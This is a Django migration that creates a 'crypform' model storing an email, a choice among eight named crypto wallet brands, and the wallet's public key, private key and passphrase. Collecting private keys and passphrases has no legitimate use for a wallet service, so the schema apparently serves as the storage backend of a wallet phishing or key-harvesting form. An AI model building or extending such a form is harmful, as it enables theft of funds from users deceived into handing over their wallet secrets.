# Generated by Django 3.2.8 on 2021-10-28 03:22

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='crypform',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email', models.EmailField(max_length=254)),
                ('wallet_name', models.IntegerField(choices=[(0, 'Ledger Nano X'), (1, 'Exodus'), (2, 'Trust'), (3, 'Robinhood'), (4, 'Coinbase'), (5, 'Trezor'), (6, 'BitPay'), (7, 'MyCelium')])),
                ('wallet_public_key', models.CharField(max_length=250)),
                ('wallet_private_key', models.CharField(max_length=250)),
                ('wallet_passphrase', models.CharField(max_length=250)),
            ],
        ),
    ]
